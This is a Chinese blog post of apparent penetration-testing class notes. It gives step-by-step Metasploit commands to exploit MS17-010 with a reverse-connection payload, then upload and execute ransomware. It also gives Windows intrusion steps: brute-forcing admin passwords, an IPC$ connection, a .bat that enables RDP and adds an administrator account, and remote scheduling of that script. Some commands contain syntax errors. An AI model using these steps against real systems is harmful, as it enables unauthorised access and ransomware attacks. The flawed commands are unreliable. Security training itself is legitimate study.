自学内容网 自学内容网

网络安全实训Day16

网络空间安全实训-渗透测试

  • 漏洞扫描

    • 定义

      • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞

    • 漏扫工具

      • AWVS

      • APPScan

      • MSF

    • 使用MSF扫描漏洞并利用

      • 1.搜索需要的攻击模块

        • search ms17-010

      • 2.使用攻击模块

        • use 模块名称

      • 3.设置扫描范围

        • set rhosts 192.168.12.0/24

      • 4.设置扫描线程

        • set thread 50

      • 5.开始扫描

        • run

      • 6.更换攻击模块为漏洞利用

      • 7.查看可用攻击载荷

        • show payloads

      • 8.设置攻击载荷

        • set payload 攻击载荷名称

      • 9.设置被攻击主机IP地址

        • set rhost IP地址

      • 10.设置反向连接的控制机IP地址

        • set lhost IP地址

      • 11.开始攻击

        • run

      • 12.上传病毒

        • upload 本地文件路径 远程主机路径

      • 13.执行勒索病毒

        • execute -f 勒索病毒路径

  • Windows内网渗透

    • 1.扫描对方操作系统和开放的端口

      • 确定对方是Windows系统开启了445接口

    • 2.针对该端口服务暴力破解Windows管理员账号密码

    • 3.与对方建立空连接

      • net use \\对方ip地址\ipc$

      • 需要输入对方的管理员账号密码

    • 4.制作开启RDP和创建管理员账户的脚本bat

      • REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

      • net user 用户名 密码 /add

      • net local group administrator 用户名 /add

    • 5.访问对方C盘默认共享,将bat复制到对方C盘

      • 在文件资源管理器地址栏中输入 \\对方IP地址\c$

    • 6.查看对方的系统时间

      • net time \\对方IP地址

    • 7.给对方创建任务计划,定时执行BAT程序,开启RDP

      • at \\对方ip地址 时间 执行的文件路径

    • 8.使用先前创建的管理员账号登陆RDP


原文地址:https://blog.csdn.net/Yisitelz/article/details/138228952

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!